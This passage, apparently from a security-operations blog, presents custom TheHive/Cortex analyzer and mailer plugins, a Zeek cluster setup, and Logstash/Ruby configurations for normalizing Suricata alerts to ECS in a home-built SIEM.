elif self.service == 'compromise':
predicate = 'Compromise'

if raw:
if raw['malicious'] == True:
level = "malicious"
value = "True"

taxonomies.append(self.build_taxonomy(
level, namespace, predicate, value))
return {"taxonomies": taxonomies}

def run(self):
if self.service == 'reputation':
data = self.get_param('data', None, 'Data is missing')
results = self.threatbook.get_reputation(data)
self.report(results)
elif self.service == 'compromise':
data = self.get_param('data', None, 'Data is missing')
results = self.threatbook.get_compromise(data)
self.report(results)
else:
self.error('Invalid data type')


if __name__ == '__main__':
ThreatBookAnalyzer().run()
  • ThreatBook_Compromise.json
{
"name": "ThreatBook_Compromise",
"version": "1.0",
"author": "Canon",
"url": "https://github.com/TheHive-Project/Cortex-Analyzers",
"license": "AGPL-V3",
"description": "Get the compromise information of IP、Domain from ThreatBook.",
"dataTypeList": [
"ip",
"domain"
],
"command": "ThreatBook/threatbook_analyzer.py",
"baseConfig": "ThreatBook",
"config": {
"service": "compromise"
},
"configurationItems": [
{
"name": "key",
"description": "API key for ThreatBook",
"type": "string",
"multi": false,
"required": true
},
{
"name": "polling_interval",
"description": "Define time interval between two requests attempts for the report",
"type": "number",
"multi": false,
"required": false,
"defaultValue": 60
}
]
}
  • ThreatBook_Reputation.json
{
"name": "ThreatBook_Reputation",
"version": "1.0",
"author": "Canon",
"url": "https://github.com/TheHive-Project/Cortex-Analyzers",
"license": "AGPL-V3",
"description": "Get the reputation information of IP from ThreatBook.",
"dataTypeList": [
"ip"
],
"command": "ThreatBook/threatbook_analyzer.py",
"baseConfig": "ThreatBook",
"config": {
"service": "reputation"
},
"configurationItems": [
{
"name": "key",
"description": "API key for ThreatBook",
"type": "string",
"multi": false,
"required": true
},
{
"name": "polling_interval",
"description": "Define time interval between two requests attempts for the report",
"type": "number",
"multi": false,
"required": false,
"defaultValue": 60
}
]
}

ProxyCheck

  • proxycheck.py
#!/usr/bin/env python3
# encoding: utf-8

import requests


class ProxyCheckError(Exception):
def __init__(self, message):
Exception.__init__(self, message)
self.message = message


class ProxyCheck():
"""
Threat intelligence: ProxyCheck
http://proxycheck.io/v2/
"""

def __init__(self, key):
self.key = key
self.ua = "HappyHunting"
self.session = requests.Session()
self.url = 'http://proxycheck.io/v2/'
self.params = {
'vpn': 1, 'asn': 1, 'time': 1, 'info': 0, 'risk': 1,
'port': 1, 'seen': 1, 'days': 7, 'tag': 'siem'
}

def _request(self, url, params={}):
"""
Request ProxyCheck API
"""
headers = {'User-Agent': self.ua}
r = self.session.get(
url=url,
params=params,
headers=headers
)

if r.status_code != 200:
raise ProxyCheckError(
'Invalid HTTP status code %i' % r.status_code)
return r.json()

def check_proxy(self, data):
"""
Checking proxy information from proxycheck.io
"""
url = self.url + data
self.params['key'] = self.key
results = self._request(url=url, params=self.params)
return self.parser_results(results, data)

def parser_results(self, r, ioc):
"""
Parsing results
"""
intel = {}
if r['status'] == 'ok':
intel = {
'ip': ioc,
'country': r[ioc]['country'],
'city': r[ioc].get('city'),  # city field (present when asn=1 is requested)
'proxy': r[ioc]['proxy'],
'type': r[ioc]['type'],
'provider': r[ioc]['provider']
}
return intel


if __name__ == '__main__':
key = '<api_key>'
proxycheck = ProxyCheck(key)

ioc = '8.8.8.8'
r = proxycheck.check_proxy(ioc)
print(r)
  • proxycheck_analyzer.py
#!/usr/bin/env python3
# encoding: utf-8

from proxycheck import ProxyCheck
from cortexutils.analyzer import Analyzer


class ProxyCheckAnalyzer(Analyzer):

def __init__(self):
Analyzer.__init__(self)
self.service = self.get_param(
'config.service', None, 'Service parameter is missing')
self.key = self.get_param(
'config.key', None, 'Missing ProxyCheck API key')
self.polling_interval = self.get_param('config.polling_interval', 1)
self.proxycheck = ProxyCheck(self.key)

def summary(self, raw):
taxonomies = []
level = "info"
namespace = "ProxyCheck"
predicate = "Proxy"
value = "False"

if raw.get("proxy") == "yes":
level = "suspicious"
value = "True"

taxonomies.append(self.build_taxonomy(
level, namespace, predicate, value))
return {"taxonomies": taxonomies}

def run(self):
if self.service == 'proxycheck':
data = self.get_param('data', None, 'Data is missing')
results = self.proxycheck.check_proxy(data)
self.report(results)
else:
self.error('Invalid data type')


if __name__ == '__main__':
ProxyCheckAnalyzer().run()
  • ProxyCheck.json
{
"name": "ProxyCheck",
"version": "1.0",
"author": "Canon",
"url": "https://github.com/TheHive-Project/Cortex-Analyzers",
"license": "AGPL-V3",
"description": "Get the compromise information of IP from ProxyCheck.",
"dataTypeList": ["ip"],
"command": "ProxyCheck/proxycheck_analyzer.py",
"baseConfig": "ProxyCheck",
"config": {
"service": "proxycheck"
},
"configurationItems": [
{
"name": "key",
"description": "API key for ProxyCheck",
"type": "string",
"multi": false,
"required": true
},
{
"name": "polling_interval",
"description": "Define time interval between two requests attempts for the report",
"type": "number",
"multi": false,
"required": false,
"defaultValue": 60
}
]
}

Responder Plugins

Mail

Cortex ships with a Mailer responder for sending email. After trying it, I found it rather limited: it does not support multiple recipients, and when triggered from Observables the recipient has to be a mail-type IoC... WTF. Don't ask how I know; that is literally what its source code does. So: if you want it done right, do it yourself.

Main features:

  1. Added batch sending on top of the original functionality;
  2. Added support for the task logs data type;
  3. Outgoing mail includes the URL of the current case or task so the recipient can jump straight to it;
  • mail.py
#!/usr/bin/env python3
# encoding: utf-8

import ssl
import smtplib
import mistune
from cortexutils.responder import Responder
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText


class Mail(Responder):
def __init__(self):
Responder.__init__(self)
self.smtp_host = self.get_param("config.smtp_host", "localhost")
self.smtp_port = self.get_param("config.smtp_port", "25")
self.mail_from = self.get_param(
"config.from", None, "Missing sender email address"
)
self.smtp_user = self.get_param("config.smtp_user", "user", None)
self.smtp_pwd = self.get_param("config.smtp_pwd", "pwd", None)
self.thehive_url = self.get_param("config.thehive_url", None, None)

def create_links(self):
"""
Create TheHive links
:rtype: String
:return: URL
"""
if self.data_type == "thehive:case":
case_id = self.get_param(
"data.id", None, "case id is missing"
)
url = self.thehive_url + "/index.html#!/case/{}/details".format(case_id)
elif self.data_type == "thehive:case_task":
case_id = self.get_param(
"data.case.id", None, "case id is missing"
)
task_id = self.get_param(
"data.id", None, "task id is missing"
)
url = self.thehive_url + "/index.html#!/case/{}/tasks/{}".format(case_id, task_id)
elif self.data_type == "thehive:case_task_log":
case_id = self.get_param(
"data.case_task.case.id", None, "case id is missing"
)
task_id = self.get_param(
"data.case_task.id", None, "task id is missing"
)
url = self.thehive_url + "/index.html#!/case/{}/tasks/{}".format(case_id, task_id)
return url

def run(self):
Responder.run(self)
if self.data_type == "thehive:case_task_log":
title = self.get_param(
"data.case_task.title", None, "title is missing")
else:
title = self.get_param("data.title", None, "title is missing")

if self.data_type in ["thehive:case", "thehive:case_task"]:
description = self.get_param(
"data.description", None, "case description is missing"
)
elif self.data_type == "thehive:case_task_log":
description = self.get_param(
"data.message", None, "task logs description is missing"
)
elif self.data_type == "thehive:alert":
description = self.get_param(
"data.case.description", None, "alert description is missing"
)
else:
self.error("Invalid dataType")

mail_to = []
if self.data_type == "thehive:case":
# Search recipient address in case tags
tags = self.get_param(
"data.tags", None, "recipient address not found in tags"
)
mail_tags = [t[5:] for t in tags if t.startswith("mail:")]
if mail_tags:
mail_to = mail_tags
else:
self.error("recipient address not found in tags")

elif self.data_type in ["thehive:case_task", "thehive:case_task_log"]:
# Search recipient address in tasks description
descr_array = description.splitlines()
if "mailto:" in descr_array[0]:
mail_str = descr_array[0].replace("mailto:", "").strip()
mail_to = [i.strip() for i in mail_str.split(',')]
else:
self.error("recipient address not found in description")
# Set rest of description as body
description = "\n".join(descr_array[1:])

elif self.data_type == "thehive:alert":
# Search recipient address in artifacts
artifacts = self.get_param(
"data.artifacts", None, "recipient address not found in observables"
)
mail_artifacts = [
a["data"]
for a in artifacts
if a.get("dataType") == "mail" and "data" in a
]
mail_tags = [
t[5:]
for t in mail_artifacts
if t.startswith("mail:")
]
if mail_tags:
mail_to = mail_tags
else:
self.error("recipient address not found in observables")

msg = MIMEMultipart()
msg["Subject"] = title
msg["From"] = self.mail_from
msg["To"] = ','.join(mail_to)
# Markdown to HTML
content = mistune.markdown(description, escape=True, hard_wrap=True)
# add TheHive Links
links = self.create_links()
content += '\n<p><a href="{}">Click me to TheHive</a></p>\n'.format(links)
msg.attach(MIMEText(content, "html", "utf-8"))

if self.smtp_user and self.smtp_pwd:
try:
context = ssl.create_default_context()
with smtplib.SMTP(self.smtp_host, self.smtp_port) as server:
server.ehlo()
server.starttls(context=context)
server.ehlo()
server.login(self.smtp_user, self.smtp_pwd)
server.send_message(msg, self.mail_from, mail_to)
except smtplib.SMTPNotSupportedError:
with smtplib.SMTP(self.smtp_host, self.smtp_port) as server:
server.ehlo()
server.login(self.smtp_user, self.smtp_pwd)
server.send_message(msg, self.mail_from, mail_to)
else:
with smtplib.SMTP(self.smtp_host, self.smtp_port) as server:
server.send_message(msg, self.mail_from, mail_to)

self.report({"message": "message sent"})

def operations(self, raw):
return [self.build_operation("AddTagToCase", tag="mail sent")]


if __name__ == "__main__":
Mail().run()
  • Mail.json
{
"name": "Mail",
"version": "1.0",
"author": "Canon",
"url": "https://github.com/TheHive-Project/Cortex-Analyzers",
"license": "AGPL-V3",
"description": "Send an email with information from a TheHive case or alert",
"dataTypeList": ["thehive:case", "thehive:alert", "thehive:case_task", "thehive:case_task_log"],
"command": "Mail/mail.py",
"baseConfig": "Mail",
"configurationItems": [
{
"name": "from",
"description": "email address from which the mail is send",
"type": "string",
"multi": false,
"required": true
},
{
"name": "smtp_host",
"description": "SMTP server used to send mail",
"type": "string",
"multi": false,
"required": true,
"defaultValue": "localhost"
},
{
"name": "smtp_port",
"description": "SMTP server port",
"type": "number",
"multi": false,
"required": true,
"defaultValue": 25
},
{
"name": "smtp_user",
"description": "SMTP server user",
"type": "string",
"multi": false,
"required": false,
"defaultValue": "user"
},
{
"name": "smtp_pwd",
"description": "SMTP server password",
"type": "string",
"multi": false,
"required": false,
"defaultValue": "pwd"
},
{
"name": "thehive_url",
"description": "TheHive server address",
"type": "string",
"multi": false,
"required": true,
"defaultValue": "http://localhost:9000"
}
]
}

Threat Intelligence

By default TheHive recommends integrating with MISP for intelligence feeds. Since we run our own threat-intelligence database, I wrote a Responder plugin that submits IoCs found during analysis. I won't paste that code here, but an example submission payload follows (and a minimal illustrative sketch of such a responder appears after it):

{
"threat": {
"ioc": "193.142.146.143",
"type": "ip",
"tags": [
"burp scan"
],
"description": "该IP在短时间内对用户登录接口发起大量访问,且包含着大量登录失败的情况",
"created_by": "canon@loveyou.com",
"producer": "Canon",
"provider": "TheHive",
"creation_time": "2021-05-14T09:48:23.664Z",
"modification_time": "2021-05-14T09:48:23.664Z",
"expiration_time": "2021-05-29T09:48:23.664Z",
"meta": {
"case": [
{
"title": "安全分析 - 周报(05.10-05.14)",
"created_by": "canon@loveyou.com",
"owner": "canon@loveyou.com",
"link": "https://127.0.0.1:9000/index.html#!/case/~43769904/observables/~463080"
}
]
}
},
"timestamp": "2021-05-14T09:48:23.664Z"
}
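
The responder code itself is omitted by the author. Purely as an illustration, a minimal Cortex responder that forwards an observable to an internal TI API could look like the sketch below; the endpoint, config item names and field paths are my own assumptions and would need adapting to the real backend and data types.

#!/usr/bin/env python3
# encoding: utf-8

import requests
from cortexutils.responder import Responder


class SubmitIoC(Responder):
    def __init__(self):
        Responder.__init__(self)
        # hypothetical config items; adjust to your own TI backend
        self.api_url = self.get_param("config.api_url", None, "Missing TI API url")
        self.api_key = self.get_param("config.api_key", None, "Missing TI API key")

    def run(self):
        Responder.run(self)
        data_type = self.get_param("data.dataType", None, "dataType is missing")
        ioc = self.get_param("data.data", None, "observable data is missing")
        payload = {"threat": {"ioc": ioc, "type": data_type, "provider": "TheHive"}}
        r = requests.post(self.api_url, json=payload,
                          headers={"Authorization": "Bearer " + self.api_key})
        if r.status_code != 200:
            self.error("TI API returned %i" % r.status_code)
        self.report({"message": "IoC submitted"})

    def operations(self, raw):
        return [self.build_operation("AddTagToCase", tag="ioc submitted")]


if __name__ == "__main__":
    SubmitIoC().run()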

How to Enable Plugins

Loading plugins

  • Plugin paths
    • /etc/cortex/Cortex-Analyzers/analyzers
    • /etc/cortex/Cortex-Analyzers/responders
$ ll /etc/cortex/Cortex-Analyzers/analyzers
drwxr-xr-x 10 root root 4096 May 5 01:48 ./
drwxr-xr-x 10 root root 4096 May 5 01:49 ../
drwxr-xr-x 2 root root 4096 May 5 01:48 ProxyCheck/
drwxr-xr-x 2 root root 4096 May 5 01:48 ThreatBook/

$ ll /etc/cortex/Cortex-Analyzers/responders
drwxr-xr-x 6 root root 4096 May 5 01:49 ./
drwxr-xr-x 10 root root 4096 May 5 01:49 ../
drwxr-xr-x 2 root root 4096 May 5 01:49 Mail/
  • Edit the configuration file /etc/cortex/application.conf

    I recommend keeping custom plugins separate from the official ones; it makes later maintenance easier.

## ANALYZERS
#
analyzer {
urls = [
"https://download.thehive-project.org/analyzers.json"
"/etc/cortex/Cortex-Analyzers/analyzers" # 新增自定义插件
]
}

# RESPONDERS
#
responder {
urls = [
"https://download.thehive-project.org/responders.json"
"/etc/cortex/Cortex-Analyzers/responders" # 新增自定义插件
]
}

Enabling plugins

  • Analyzers

    • ThreatBook - Analyzers Config

    ![Analyzers Config](/Analyzers Config.png)

    • ThreatBook - Analyzers

    Analyzers

  • Responders

    • Mail - Responders Config

    ![Responders Config](/Responders Config.png)

    • Mail - Responders

    Responders

Use Cases

Here is what we currently use TheHive for. The use cases are still fairly limited at this early stage and will grow as we explore further.

workflow

Create templates in advance, e.g. in the form of Playbooks, so they can be reused quickly later:

  • Weekly analysis report template

    Create one Case per week and one Task per day.

    周报模板

  • Incident response template

    Can be structured around the phases of incident response

    应急响应

  • Applying a template

    引用模板

  • Event operations: SIEM (Alarm) -> TheHive (Alert)

    TheHive is integrated with the SIEM, which automatically pushes two kinds of alerts to it.

    • The first kind: security events that need human triage, e.g. internal-to-external NetFlow alerts (unusual port access, periodic beaconing, etc.) and data-leak alerts (hacker-forum monitoring, GitHub monitoring). These usually require secondary confirmation, so TheHive is used to record the whole handling process.

      人工研判事件-1

    • The second kind: security events that need close attention, e.g. EDR alerts or intelligence hits on C2 indicators, which must be responded to immediately.

      • During response, Cortex Analyzers assist with the analysis: querying several intelligence vendors at once, enriching the data (PDNS, Whois, CMDB, etc.), and pulling related events of the recent period from the SIEM.
      • For confirmed indicators, Cortex Responders push blocking policies to the security devices in bulk to stop the loss quickly.
      • For cross-department issues, TheHive keeps everyone synced on the response progress, including discussing the issue within the same Case.
      • Recording the response process helps us refine the incident response workflow and accumulate Playbooks, paving the way for later automation.
  • Rule operations: SIEM (Alarm/Alert) -> TheHive (Case)

    False positives and missed detections found during analysis are submitted to TheHive as Cases manually. For example, when an alert in the SIEM turns out to be a false positive, the alert is submitted from the SIEM to the designated owner, and the system automatically routes the email and the Case to that person.

    • Pushed from the SIEM to TheHive, notifying the analyst to tune the rule.

    规则运营-4

    • Submit the Case and notify by email

    规则运营-5

    规则运营-6

    • TheHive

    规则运营-7

    规则运营-8

  • Routine work:

    • Weekly security analysis report

      • Create one Case per week

      安全分析周报01

      • Create one Task per day

      安全分析周报03

      • Link alerts to the Case

      安全分析周报05

      • Analyze IoCs in bulk

      安全分析周报02

      • Share with the teams that need to follow it

      安全分析周报04


Closing thoughts:

If you follow open-source solutions, you have probably seen TheHive combined with workflow engines such as Shuffle or n8n. TheHive's strength is clearly incident response and analysis, in a semi-automated form; wired up to a workflow engine, it starts to look like a "DIY" SOAR. Commercial SOARs add a "war room" concept that is quite similar to what TheHive offers: in a war room you might look up intelligence on an IP, or drive existing security devices to act on an IoC, which maps directly onto TheHive's Analyzers and Responders.

I think TheHive's semi-automated style complements a SOAR nicely, and integrating the two would surface even more value: an analysis task could selectively trigger the SOAR's Playbooks for different scenarios and feed the results back into TheHive. There is a lot more worth saying about TheHive than fits in one post; the rest has to be dug out of real-world scenarios, and the way you think about it matters most.

Installation

Online installation

$ echo 'deb http://download.opensuse.org/repositories/security:/zeek/Debian_10/ /' | sudo tee /etc/apt/sources.list.d/security:zeek.list
$ curl -fsSL https://download.opensuse.org/repositories/security:zeek/Debian_10/Release.key | gpg --dearmor | sudo tee /etc/apt/trusted.gpg.d/security_zeek.gpg > /dev/null
$ sudo apt update
$ sudo apt install zeek

Architecture

_images / deployment.png

Manager -> Worker

  1. When setting up a cluster, a zeek user must be created on every host, the manager must be able to ssh to all machines in the cluster as that user without being prompted for a password or passphrase (e.g. via SSH public-key authentication), and on worker nodes the user must be able to access the capture interfaces in promiscuous mode.
  2. Storage must be available on all hosts under the same path.
Manager
# 安装Zeek 略过

# 生成SSH Key
$ ssh-keygen

# 记得Worker节点需要创建.ssh目录

# 复制ssh pub到Zeek Worker
$ scp /root/.ssh/id_rsa.pub root@Zeek-Worker1:~/.ssh/authorized_keys2

# 配置Manager node.cfg
$ vim /opt/zeek/etc/node.cfg
[logger-1]
type=logger
host=Zeek-Manager
#
[manager]
type=manager
host=Zeek-Manager
#
[proxy-1]
type=proxy
host=Zeek-Manager
#
[worker-1]
type=worker
host=Zeek-Worker1
interface=ens224
#
[worker-2]
type=worker
host=Zeek-Worker2
interface=ens224

# 检查Zeek
$ zeekctl
[ZeekControl] > check
logger-1 scripts are ok.
manager scripts are ok.
proxy-1 scripts are ok.
worker-1 scripts are ok.
worker-2 scripts are ok.

# 启动Zeek
$ zeekctl
[ZeekControl] > start
starting logger ...
starting manager ...
starting proxy ...
starting workers ...

Whether the cluster actually performs better than a single node remains to be tested.

Background

Work has been busy, so it has been a while since the last post; with the end of the year approaching, consider this a recap. This year my energy went mostly into security operations, and along the way I found that the SIEM I had "assembled" was not that comfortable to use. I previously wrote 《Wazuh-如何对异构数据进行关联告警》, where the planned data workflow looked like the figure below.

image-20200303215020561

The "DIY" SIEM is built on the ELK stack, with Wazuh and Elastalert as the alerting modules. Early on, to let Wazuh consume heterogeneous data (WAF, NTA, EDR) and correlate alerts across them, I normalized the data with Logstash before indexing, and Wazuh correlated the normalized events. For example, Suricata alerts are shipped via Filebeat, normalized centrally by Logstash, and written both to Elastic and to Wazuh: Elastic keeps the raw alert data, while Wazuh receives the normalized security events.


Shortcomings of "DIY" SIEM v0.1 and How to Fix Them

1. Data normalization

The early normalization did not follow ECS (Elastic Common Schema), which became inconvenient once we leaned further into the Elastic ecosystem. Elasticsearch introduced the SIEM app in 7.x, and if you want to use Elastic SIEM for analysis, ECS is the obvious choice. To integrate better with the open-source ecosystem, the old normalization needs to be converted to ECS.

2. Alert enrichment

To raise alert quality and make analysis more efficient, both the ingested security events and the resulting alerts need to be enriched.

  • Use CMDB data to enrich internal assets, e.g. adding department, business line, application type and owner fields.

  • Integrate threat-intelligence data; the SIEM enriches the attacking IP of an alert with intelligence:

    • Local threat intelligence (IPs that have attacked us before)
    • Third-party threat intelligence
      • Open source
      • Commercial
  • Monitor sensitive endpoints (e.g. login, payment, wallet). Third-party data is used to tag proxy IPs, giving risk-control teams extra context for their decisions;

  • Add direction and zone fields to every event, so analysts can immediately tell internal-to-internal from internal-to-external alerts, and alert severity can be weighted by direction;

3. Better detection

The detection quality of the underlying sensors, and the fidelity of their events, directly determine the quality of SIEM alerts.

  • Ingest Imperva WAF alerts and correlate them automatically with Suricata, periodically "porting" bypassed rules to the Imperva WAF at the edge to harden the perimeter;
  • Consume AWS VPC Flow data to detect anomalous outbound connections. Being layer-4 data, there are not many dimensions to work with; the main alerts implemented are (a simple sketch of the port-scan heuristic follows this list):
    • Periodic (beaconing) connections
    • Threat-intelligence matches
    • Port scans
      • An internal host hitting many ports on the same destination IP within a short window
      • An internal host hitting the same destination port on many IPs within a short window
    • Requests to sensitive ports
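
As promised above, here is a toy Python sketch of the first port-scan heuristic (one internal host, many ports on the same destination within a short window); the thresholds are illustrative, not the production values, and the real logic lives in the SIEM rules.

from collections import defaultdict

WINDOW, PORT_THRESHOLD = 60, 20  # seconds, distinct ports

def detect_port_scans(flows):
    # flows: iterable of (timestamp, src_ip, dst_ip, dst_port) records
    buckets = defaultdict(set)
    for ts, src, dst, dport in flows:
        buckets[(src, dst, int(ts // WINDOW))].add(dport)
    return [key[:2] for key, ports in buckets.items() if len(ports) >= PORT_THRESHOLD]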

4. Hunting and traceability

Alerts produced by the SIEM currently do not carry the underlying raw security events, which is unfriendly to analysts, especially when alert volumes are high.

  • Every alert now carries a "Hunting" field that links straight back to the underlying security events;
  • Added dashboards better suited to security analysts;
  • Wrote a tool that I find quite analyst-friendly: HappyHunting

5. Other improvements

  • Fixed the problem of the CDN WAF API taking far too long (15-20 minutes 😅) to act on SIEM-driven blocks; the Imperva WAF API integration is now near real time.

  • Optimized the NTA login_audit code to improve NTA performance. I previously wrote 《Suricata + Lua实现本地情报对接》, which used Lua to audit logins on sensitive endpoints and detect high-risk accounts against intelligence; that functionality has now been ported to Logstash + Ruby;

  • Automated blocking rules used to be managed by hand-editing scripts and adjusting rule.id, which barely worked early on and later proved hard to manage and costly to maintain. Rules are now managed centrally in Redis: to block on a rule, just push its rule.id to Redis, and the outgoing alarm's event.action field records how that alert should be handled (a minimal sketch follows this list);
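
A minimal sketch of that Redis-backed rule management, using the standard redis-py client (key name and rule ids are examples only, not the real configuration):

import redis

r = redis.Redis(host="127.0.0.1", port=6379, db=0)

# rules whose hits should trigger an automated block
r.sadd("siem:block_rule_ids", 2100498, 2210045)

def action_for(rule_id: int) -> str:
    # value written into event.action on the outgoing alarm
    return "blocked" if r.sismember("siem:block_rule_ids", rule_id) else "alert"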


"Evolution" - "DIY" SIEM v0.2

1. Workflow

Here is the reworked workflow of "DIY" SIEM v0.2 😁, shown below. I won't go into the collectors on the data-source side; they are off-the-shelf shippers doing their job. The interesting part is how Logstash processes the data:

SIEM-v0.2


2. Data processing

1. Normalized

image-20201208110506481


1.1 normalized-alert_to_siem

Normalization of alert events, i.e. the data emitted by the security sensors; see the blue lines in the figure above.

Filebeat's Suricata module already maps Suricata data to ECS, so we can enable it directly. Note, however, that by default some of the module's normalization is delegated to Elastic. Since we need Logstash for the subsequent ETL steps, the data flow is now Filebeat -> Logstash -> Elastic, which means that part of the normalization has to be implemented at the Logstash layer. The relevant configuration is as follows:

1.1.1 normalized-suricata

Normalization applied to every Suricata event.

  • Remove some fields added by Filebeat.
  • Add provider, product and sensor fields so that different data-source types (e.g. NTA, WAF, EDR) and different NTA products (e.g. Suricata, Zeek) can be told apart later
Logstash Config
filter {
mutate {
remove_field => [ "application", "type", "agent", "@version", "[event][original]" ]
add_field => {
"provider" => "Suricata"
"product" => "IDS"
"sensor" => "%{[host][name]}"
}
lowercase => [ "[network][transport]" ]
}
uuid {
target => "[event][id]"
overwrite => true
}
}

1.1.2 normalized-alert_for_suricata
Logstash Config
filter {
if [suricata][eve][alert] {
mutate {
rename => {
"[suricata][eve][alert][category]" => "[rule][category]"
"[suricata][eve][alert][signature_id]" => "[rule][id]"
"[suricata][eve][alert][signature]" => "[rule][name]"
"[suricata][eve][alert][rule]" => "[rule][description]"
}
}

mutate {
convert => {
"[rule][id]" => "integer"
}
copy => {
"[rule][category]" => "message"
}
}

if [suricata][eve][alert][action] == "blocked" {
mutate {
update => {
"[suricata][eve][alert][action]" => "denied"
}
}
}

if [suricata][eve][alert][action] {
ruby {
code => "
action = event.get('[suricata][eve][alert][action]')

event_type = event.get('[event][type]')
if event_type then
event_type = event.get('[event][type]').push(action)
else
event_type = [action]
end
event.set('[event][type]', event_type)
event.remove('[suricata][eve][alert][action]')

event.set('[event][action]', action)
"
}
}

mutate {
rename => {
"[suricata][eve][alert][severity]" => "[event][severity]"
"[suricata][eve][payload_printable]" => "[rule][payload]"
"[suricata][eve][http][http_request_body_printable]" => "[http][request][body][content]"
"[suricata][eve][http][http_response_body_printable]" => "[http][response][body][content]"
}
}

ruby {
code => "
rule_id = event.get('[rule][id]')
rule_name = event.get('[rule][name]')
event_id = event.get('[event][id]')

event.set('[related][rule][id]', [rule_id])
event.set('[related][rule][name]', [rule_name])
event.set('[related][event][id]', [event_id])
"
}
}
}

1.1.3 normalized-fileinfo_for_suricata
Logstash Config
filter {
if [suricata][eve][fileinfo] {
mutate {
rename => {
"[suricata][eve][fileinfo][filename]" => "[file][path]"
"[suricata][eve][fileinfo][size]" => "[file][size]"
}
}
}
}

1.1.4 normalized-flow_for_suricata
Logstash Config
filter {
if [suricata][eve][flow] {
mutate {
rename => {
"[suricata][eve][flow][pkts_toclient]" => "[destination][packets]"
"[suricata][eve][flow][pkts_toserver]" => "[source][packets]"
"[suricata][eve][flow][bytes_toclient]" => "[destination][bytes]"
"[suricata][eve][flow][bytes_toserver]" => "[source][bytes]"
}
}

ruby {
init => "
@sb = 0
@sp = 0
@db = 0
@dp = 0
"

code => "
events = event.to_hash

if events.has_key?('source') then
@sb = events['source'].fetch('bytes', 0)
@sp = events['source'].fetch('packets', 0)
end

if events.has_key?('destination') then
@db = events['destination'].fetch('bytes', 0)
@dp = events['destination'].fetch('packets', 0)
end

if (@sb+@db+@sp+@dp > 0) then
if (@sb+@db > 0) then
event.set('[network][bytes]', @sb+@db)
end
if (@sp+@dp > 0) then
event.set('[network][packets]', @sp+@dp)
end
end
"
}

date {
match => [ "[suricata][eve][flow][start]", "ISO8601" ]
target => "[event][start]"
}

date {
match => [ "[suricata][eve][flow][end]", "ISO8601" ]
target => "[event][end]"
}

mutate {
rename => {
"[suricata][eve][flow][age]" => "[event][duration]"
}
}

mutate {
remove_field => [
"[suricata][eve][flow][start]",
"[suricata][eve][flow][end]"
]
}
}
}

1.1.5 normalized-http_for_suricata
Logstash Config
filter {
if [suricata][eve][http] {
mutate {
rename => {
"[suricata][eve][http][http_method]" => "[http][request][method]"
"[suricata][eve][http][status]" => "[http][response][status_code]"
"[suricata][eve][http][hostname]" => "[destination][domain]"
}
}

if [destination][domain] and [network][protocol] == "http" {
mutate {
copy => { "[destination][domain]" => "[url][domain]" }
}
}

ruby {
init => "
@pattern = /(?<path>[^?#]*)(?:\?(?<query>[^#]*))?(?:#(?<fragment>.*))?/
"
code => "
url = event.get('[suricata][eve][http][url]')
res = @pattern.match(url)

if res['path'] then
event.set('[url][path]', res['path'])
end
if res['query'] then
event.set('[url][query]', res['query'])
end
if res['fragment'] then
event.set('[url][fragment]', res['fragment'])
end
"
}

mutate {
rename => {
"[suricata][eve][http][url]" => "[url][original]"
"[suricata][eve][http][http_refer]" => "[http][request][referrer]"
"[suricata][eve][http][length]" => "[http][response][body][bytes]"
"[suricata][eve][http][http_user_agent]" => "[user_agent][original]"
}
}
}
}

1.1.6 normalized_http_headers_for_suricata

With dump-all-headers: both set, Suricata outputs all HTTP headers. That is great for the http_audit use case, but the output format is rather awkward 😂. To make filtering in Kibana easier, I normalize this part of the data. 😁

Logstash Config
filter {
if [suricata][eve][http] {
ruby {
path => "/etc/logstash/scripts/normalized_http_headers.rb"
}
}
}
Ruby Code
def filter(event)
request = {}
response = {}

request_headers = event.get("[suricata][eve][http][request_headers]")
response_headers = event.get("[suricata][eve][http][response_headers]")

if request_headers then
request_headers.each do |headers|
name = headers['name'].downcase
value = headers['value']
request[name] = value
end
end

if response_headers then
response_headers.each do |headers|
name = headers['name'].downcase
value = headers['value']
response[name] = value
end
end

event.remove("[suricata][eve][http][request_headers]")
event.remove("[suricata][eve][http][response_headers]")
event.set("[suricata][eve][http][request]", request)
event.set("[suricata][eve][http][response]", response)
return [event]
end
Example
  • Data before normalization:
{
"request_headers": [
{
"name": "Connection",
"value": "Keep-Alive"
}
],
"response_headers": [
{
"name": "Server",
"value": "NWS_TCloud_S11"
}
]
}
  • Data after normalization:
{
"http": {
"request": {
"host": "192.168.199.1:25782",
"connection": "Close",
"cache-control": "no-cache",
"pragma": "no-cache",
"user-agent": "Microsoft-Windows/10.0 UPnP/1.0",
"accept": "text/xml, application/xml"
},
"response": {
"ext": "",
"content-length": "2645",
"server": "RT-N56U/3.4.3.9 UPnP/1.1 MiniUPnPd/2.0",
"content-type": "text/xml; charset=\"utf-8\"",
"connection": "close"
}
}
}

1.1.7 normalized-tls_for_suricata
Logstash Config
filter {
if [suricata][eve][tls] {
mutate {
uppercase => [
"[tls][server][hash][sha1]"
]
split => {
"[tls][server][hash][sha1]" => ":"
}
join => {
"[tls][server][hash][sha1]" => ""
}
copy => {
"[tls][server][hash][sha1]" => "[related][hash]"
}
}
}
}

1.2 normalized-alarm_from_siem

Normalization of alarm events, i.e. the data emitted by the SIEM; see the red lines in the figure above.

1.2.1 normalized-alarm

Normalization applied to every alarm event.

Logstash Config
filter {
date {
match => ["timestamp", "ISO8601"]
target => "timestamp"
}

mutate {
rename => {
"[data][source]" => "source"
"[data][destination]" => "destination"
"[data][network]" => "network"

"[data][event]" => "event"
"[data][fileset]" => "fileset"

"[data][http]" => "http"
"[data][url]" => "url"
"[data][user_agent]" => "user_agent"

"[data][related]" => "related"
"[data][threat]" => "threat"

"[rule][groups]" => "[rule][ruleset]"
}

convert => {
#"[agent][id]" => "integer"

"[event][severity]" => "integer"

"[rule][id]" => "integer"

"[related][rule][id]" => "integer"

"[network][bytes]" => "integer"
"[network][packets]" => "integer"

"[source][port]" => "integer"
"[source][bytes]" => "integer"
"[source][packets]" => "integer"

"[destination][port]" => "integer"
"[destination][bytes]" => "integer"
"[destination][packets]" => "integer"

"[http][response][status_code]" => "integer"
"[http][response][body][bytes]" => "integer"
}

remove_field => [
"beat", "input_type", "tags", "count", "@version",
"ecs", "log", "offset", "type", "host", "predecoder",
"decoder", "[data][rule]"
]

copy => {
"[rule][description]" => "[rule][name]"
}
}

if [event][kind] == "alarm" {
mutate {
rename => {
"previous_output" => "[related][event][log]"
}
}

ruby {
code => "
src_ip = event.get('[source][ip]')
dst_ip = event.get('[destination][ip]')
src_port = event.get('[source][port]').to_s
